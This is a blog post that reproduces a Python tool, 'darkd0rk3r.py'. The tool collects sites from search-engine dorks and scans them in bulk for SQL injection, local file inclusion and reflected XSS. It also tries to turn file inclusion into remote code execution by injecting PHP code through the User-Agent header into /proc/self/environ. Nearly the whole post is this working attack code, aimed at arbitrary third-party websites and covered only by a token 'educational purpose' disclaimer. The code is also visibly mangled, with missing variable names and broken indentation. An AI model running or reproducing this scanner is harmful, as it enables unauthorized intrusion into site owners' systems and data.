15 Okt 2012

Scan Dork From Python

Hi guys,
:) 



001#!/usr/bin/python
002# This was written for educational purpose and pentest only. Use it at your own risk.
003# Author will be not responsible for any damage!
004# !!! Special greetz for my friend sinner_01 !!!
005# Toolname        : darkd0rk3r.py
006# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
007# Version         : 0.8
008# Greetz for rsauron and low1z, great python coders
009# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org
010#
011
012import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
013from random import choice
014
015# Colours
016= "\033[0m"
017= "\033[31m";
018= "\033[32m";
019= "\033[33m";
020= "\033[34m";
021
022
023# Banner
024def logo():
025    print R+"\n|---------------------------------------------------------------|"
026        print "| b4ltazar[@]gmail[dot]com                                      |"
027        print "|   08/2012     darkd0rk3r.py  v.0.8                            |"
028        print "|    b4ltazar.wordpress.com    &   ljuska.org                   |"
029        print "|                                                               |"
030        print "|---------------------------------------------------------------|\n"
031    print W
032
033if sys.platform == 'linux' or sys.platform == 'linux2':
034  subprocess.call("clear", shell=True)
035  logo()
036   
037else:
038  subprocess.call("cls", shell=True)
039  logo()
040   
041log = "darkd0rk3r-sqli.txt"
042logfile = open(log, "a")
043lfi_log = "darkd0rk3r-lfi.txt"
044lfi_log_file = open(lfi_log, "a")
045rce_log = "darkd0rk3r-rce.txt"
046rce_log_file = open(rce_log, "a")
047xss_log = "darkd0rk3r-xss.txt"
048xss_log_file = open(xss_log, "a")
049
050threads = []
051finallist = []
052vuln = []
053col = []
054arg_end = "--"
055arg_eva = "+"
056colMax = 10
057gets = 0
058timeout = 300
059socket.setdefaulttimeout(timeout)
060
061
062
063            
064lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
065
066xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
067
068sqlerrors = {'MySQL': 'error in your SQL syntax',
069             'MiscError': 'mysql_fetch',
070             'MiscError2': 'num_rows',
071             'Oracle': 'ORA-01756',
072             'JDBC_CFM': 'Error Executing Database Query',
073             'JDBC_CFM2': 'SQLServer JDBC Driver',
074             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
075             'MSSQL_Uqm': 'Unclosed quotation mark',
076             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
077             'MS-Access_JETdb': 'Microsoft JET Database',
078             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
079             'Server Error' : 'Server Error',
080             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
081             'Invalid Querystring' : 'Invalid Querystring',
082             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
083             'VBScript Runtime' : 'VBScript Runtime',
084             'ADODB.Field' : 'ADODB.Field',
085             'BOF or EOF' : 'BOF or EOF',
086             'ADODB.Command' : 'ADODB.Command',
087             'JET Database' : 'JET Database',
088             'mysql_fetch_array()' : 'mysql_fetch_array()',
089             'Syntax error' : 'Syntax error',
090             'mysql_numrows()' : 'mysql_numrows()',
091             'GetArray()' : 'GetArray()',
092             'FetchRow()' : 'FetchRow()',
093             'Input string was not in a correct format' : 'Input string was not in a correct format'}
094              
095
096header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
097          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
098          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
099      'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
100      'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
101      'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
102      'Microsoft Internet Explorer/4.0b1 (Windows 95)',
103      'Opera/8.00 (Windows NT 5.1; U; en)',
104      'amaya/9.51 libwww/5.4.0',
105      'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
106      'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
107      'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
108      'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
109      'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
110      'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
111       
112       
113domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
114           'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
115           'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
116           'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
117           'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
118           'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
119           'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
120           'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
121           'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
122           'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
123           'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
124           'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
125           'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
126           'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
127           'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
128           'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
129           'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
130           'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
131           'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
132           'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
133           'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
134           'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
135           'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
136           'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
137           'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
138           'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
139           'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
140           'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
141           'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
142           'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
143           'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
144            
145
146
147
148
149def search(inurl, maxc):
150  urls = []
151  for site in sitearray:
152    page = 0
153    try:
154      while page < int(maxc):
155    jar = cookielib.FileCookieJar("cookies")
156    query = inurl+"+site:"+site
157    results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
158    request_web =urllib2.Request(results_web)
159    agent = random.choice(header)
160    request_web.add_header('User-Agent', agent)
161    opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
162    text = opener_web.open(request_web).read()
163    stringreg = re.compile('(?<=href=")(.*?)(?=")')
164        names = stringreg.findall(text)
165        page += 1
166        for name in names:
167      if name not in urls:
168        if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
169          pass
170        elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
171          pass
172        else:
173          urls.append(name)
174    percent = int((1.0*page/int(maxc))*100)
175    urls_len = len(urls)
176    sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
177    sys.stdout.flush()
178    except(KeyboardInterrupt):
179      pass
180  tmplist = []
181  print "\n\n[+] URLS (unsorted): ",len(urls)
182  for url in urls:
183    try:
184      host = url.split("/",3)
185      domain = host[2]
186      if domain not in tmplist and "=" in url:
187    finallist.append(url)
188    tmplist.append(domain)
189     
190    except:
191      pass
192  print "[+] URLS (sorted)  : ",len(finallist)
193  return finallist
194
195   
196class injThread(threading.Thread):
197        def __init__(self,hosts):
198                self.hosts=hosts
199                self.fcount = 0
200                self.check = True
201                threading.Thread.__init__(self)
202
203        def run (self):
204                urls = list(self.hosts)
205                for url in urls:
206                        try:
207                                if self.check == True:
208                                        ClassicINJ(url)
209                                else:
210                                        break
211                        except(KeyboardInterrupt,ValueError):
212                                pass
213                self.fcount+=1
214
215        def stop(self):
216                self.check = False
217                 
218class lfiThread(threading.Thread):
219        def __init__(self,hosts):
220                self.hosts=hosts
221                self.fcount = 0
222                self.check = True
223                threading.Thread.__init__(self)
224
225        def run (self):
226                urls = list(self.hosts)
227                for url in urls:
228                        try:
229                                if self.check == True:
230                                        ClassicLFI(url)
231                                else:
232                                        break
233                        except(KeyboardInterrupt,ValueError):
234                                pass
235                self.fcount+=1
236
237        def stop(self):
238                self.check = False
239                 
240class xssThread(threading.Thread):
241        def __init__(self,hosts):
242                self.hosts=hosts
243                self.fcount = 0
244                self.check = True
245                threading.Thread.__init__(self)
246
247        def run (self):
248                urls = list(self.hosts)
249                for url in urls:
250                        try:
251                                if self.check == True:
252                                        ClassicXSS(url)
253                                else:
254                                        break
255                        except(KeyboardInterrupt,ValueError):
256                                pass
257                self.fcount+=1
258
259        def stop(self):
260                self.check = False
261                 
262                 
263def ClassicINJ(url):
264        EXT = "'"
265        host = url+EXT
266        try:
267                source = urllib2.urlopen(host).read()
268                for type,eMSG in sqlerrors.items():
269                        if re.search(eMSG, source):
270                                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
271                logfile.write("\n"+host)
272                vuln.append(host)
273                col.append(host)
274                break
275                 
276                 
277                        else:
278                                pass
279        except:
280                pass
281
282
283def ClassicLFI(url):
284  lfiurl = url.rsplit('=', 1)[0]
285  if lfiurl[-1] != "=":
286    lfiurl = lfiurl + "="
287  for lfi in lfis:
288    try:
289      check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
290      if re.findall("root:x", check):
291    print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
292    lfi_log_file.write("\n"+lfiurl+lfi)
293    vuln.append(lfiurl+lfi)
294    target = lfiurl+lfi
295    target = target.replace("/etc/passwd","/proc/self/environ")
296    header = "<? echo md5(baltazar); ?>"
297        try:
298      request_web = urllib2.Request(target)
299      request_web.add_header('User-Agent', header)
300      text = urllib2.urlopen(request_web)
301      text = text.read()
302      if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
303        print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
304        rce_log_file.write("\n",target)
305        vuln.append(target)
306        except:
307      pass
308     
309    except:
310      pass
311
312def ClassicXSS(url):
313  for xss in xsses:
314    try:
315      source = urllib2.urlopen(url+xss.replace("\n","")).read()
316      if re.findall("XSS by baltazar", source):
317    print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
318    xss_log_file.write("\n"+url+xss)
319    vuln.append(url+xss)
320    except:
321      pass
322
323def injtest():
324  print B+"\n[+] Preparing for SQLi scanning ..."
325  print "[+] Can take a while ..."
326  print "[!] Working ...\n"
327  i = len(usearch) / int(numthreads)
328  m = len(usearch) % int(numthreads)
329  z = 0
330  if len(threads) <= numthreads:
331    for x in range(0, int(numthreads)):
332      sliced = usearch[x*i:(x+1)*i]
333      if (z<m):
334    sliced.append(usearch[int(numthreads)*i+z])
335    z +=1
336      thread = injThread(sliced)
337      thread.start()
338      threads.append(thread)
339    for thread in threads:
340      thread.join()
341       
342def lfitest():
343  print B+"\n[+] Preparing for LFI - RCE scanning ..."
344  print "[+] Can take a while ..."
345  print "[!] Working ...\n"
346  i = len(usearch) / int(numthreads)
347  m = len(usearch) % int(numthreads)
348  z = 0
349  if len(threads) <= numthreads:
350    for x in range(0, int(numthreads)):
351      sliced = usearch[x*i:(x+1)*i]
352      if (z<m):
353    sliced.append(usearch[int(numthreads)*i+z])
354    z +=1
355      thread = lfiThread(sliced)
356      thread.start()
357      threads.append(thread)
358    for thread in threads:
359      thread.join()
360
361def xsstest():
362  print B+"\n[+] Preparing for XSS scanning ..."
363  print "[+] Can take a while ..."
364  print "[!] Working ...\n"
365  i = len(usearch) / int(numthreads)
366  m = len(usearch) % int(numthreads)
367  z = 0
368  if len(threads) <= numthreads:
369    for x in range(0, int(numthreads)):
370      sliced = usearch[x*i:(x+1)*i]
371      if (z<m):
372    sliced.append(usearch[int(numthreads)*i+z])
373    z +=1
374      thread = xssThread(sliced)
375      thread.start()
376      threads.append(thread)
377    for thread in threads:
378      thread.join()
379
380menu = True
381new = 1
382while menu == True:
383  if new == 1:
384    threads = []
385    finallist = []
386    vuln = []
387    col = []
388     
389    stecnt = 0
390    for k,v in domains.items():
391      stecnt += 1
392      print str(stecnt)+" - "+k
393    sitekey = raw_input("\nChoose your target   : ")
394    sitearray = domains[domains.keys()[int(sitekey)-1]]
395     
396
397    inurl = raw_input('\nEnter your dork      : ')
398    numthreads = raw_input('Enter no. of threads : ')
399    maxc = raw_input('Enter no. of pages   : ')
400    print "\nNumber of SQL errors :",len(sqlerrors)
401    print "Number of LFI paths  :",len(lfis)
402    print "Number of XSS cheats :",len(xsses)
403    print "Number of headers    :",len(header)
404    print "Number of threads    :",numthreads
405    print "Number of pages      :",maxc
406    print "Timeout in seconds   :",timeout
407    print ""
408   
409    usearch = search(inurl,maxc)
410    new = 0
411   
412  print R+"\n[0] Exit"
413  print "[1] SQLi Testing"
414  print "[2] SQLi Testing with Column Finder"
415  print "[3] LFI - RCE Testing"
416  print "[4] XSS Testing"
417  print "[5] SQLi and LFI - RCE Testing"
418  print "[6] SQLi and XSS Testing"
419  print "[7] LFI -RCE and XSS Testing"
420  print "[8] SQLi,LFI - RCE and XSS Testing"
421  print "[9] Save valid urls to file"
422  print "[10] Print valid urls"
423  print "[11] Found vuln in last scan"
424  print "[12] New Scan\n"
425   
426  chce = raw_input(":")
427  if chce == '1':
428    injtest()
429     
430  if chce == '2':
431    injtest()
432    print B+"\n[+] Preparing for Column Finder ..."
433    print "[+] Can take a while ..."
434    print "[!] Working ..."
435    # Thanks rsauron for schemafuzz
436    for host in col:
437      print R+"\n[+] Target: ", O+host
438      print R+"[+] Attempting to find the number of columns ..."
439      print "[+] Testing: ",
440      checkfor = []
441      host = host.rsplit("'", 1)[0]
442      sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
443      makepretty = ""
444      for x in xrange(0, colMax):
445    try:
446      sys.stdout.write("%s," % (x))
447      sys.stdout.flush()
448      darkc0de = "dark"+str(x)+"c0de"
449      checkfor.append(darkc0de)
450      if x > 0:
451        sitenew += ","
452      sitenew += "0x"+darkc0de.encode("hex")
453      finalurl = sitenew+arg_end
454      gets += 1
455      source = urllib2.urlopen(finalurl).read()
456      for y in checkfor:
457        colFound = re.findall(y, source)
458        if len(colFound) >= 1:
459          print "\n[+] Column length is:", len(checkfor)
460          nullcol = re.findall(("\d+"), y)
461          print "[+] Found null column at column #:", nullcol[0]
462          for z in xrange(0, len(checkfor)):
463        if z > 0:
464          makepretty += ","
465        makepretty += str(z)
466          site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
467          print "[+] SQLi URL:", site+arg_end
468          site = site.replace(","+nullcol[0]+",",",darkc0de,")
469          site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
470          site = site.replace(","+nullcol[0],",darkc0de")
471          print "[+] darkc0de URL:", site
472          print "[-] Done!\n"
473           
474    except(KeyboardInterrupt, SystemExit):
475      raise
476    except:
477      pass
478       
479      print "\n[!] Sorry column length could not be found\n"
480      ###########
481       
482       
483       
484  if chce == '3':
485    lfitest()
486   
487  if chce == '4':
488    xsstest()
489     
490  if chce == '5':
491    injtest()
492    lfitest()
493      
494  if chce == '6':
495    injtest()
496    xsstest()
497     
498  if chce == '7':
499    lfitest()
500    xsstest()
501     
502  if chce == '8':
503    injtest()
504    lfitest()
505    xsstest()
506     
507  if chce == '9':
508    print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
509    listname = raw_input("Filename: ")
510    list_name = open(listname, "w")
511    finallist.sort()
512    for t in finallist:
513      list_name.write(t+"\n")
514    list_name.close()
515    print "Urls saved, please check", listname
516    
517  if chce == '10':
518    print W+"\nPrinting valid urls:\n"
519    finallist.sort()
520    for t in finallist:
521      print B+t
522       
523  if chce == '11':
524    print B+"\nVuln found ",len(vuln)
525     
526  if chce == '12':
527    new = 1
528    print W+""
529
530  if chce == '0':
531    print R+"\n[-] Exiting ..."
532    mnu = False
533    print W
534    sys.exit(1)











Created By

Terimakasih telah membaca artikel Scan Dork From Python ,semoga bermanfaat!

Anonim mengatakan...


Feel free to visit my website free online slots with bonus

Unknown mengatakan...

if you want to advertise please contact me please do not coment like this

Berlangganan FEED via email

----------welcome to blog gila----------

Scan Dork From Python

Copyright  © Blog GILA- Blog GIla - - All Right Reserved. | Theme Edited by junotz

Berbagai Tips Dan Tutorial Gratis | Tips tutorial Gratis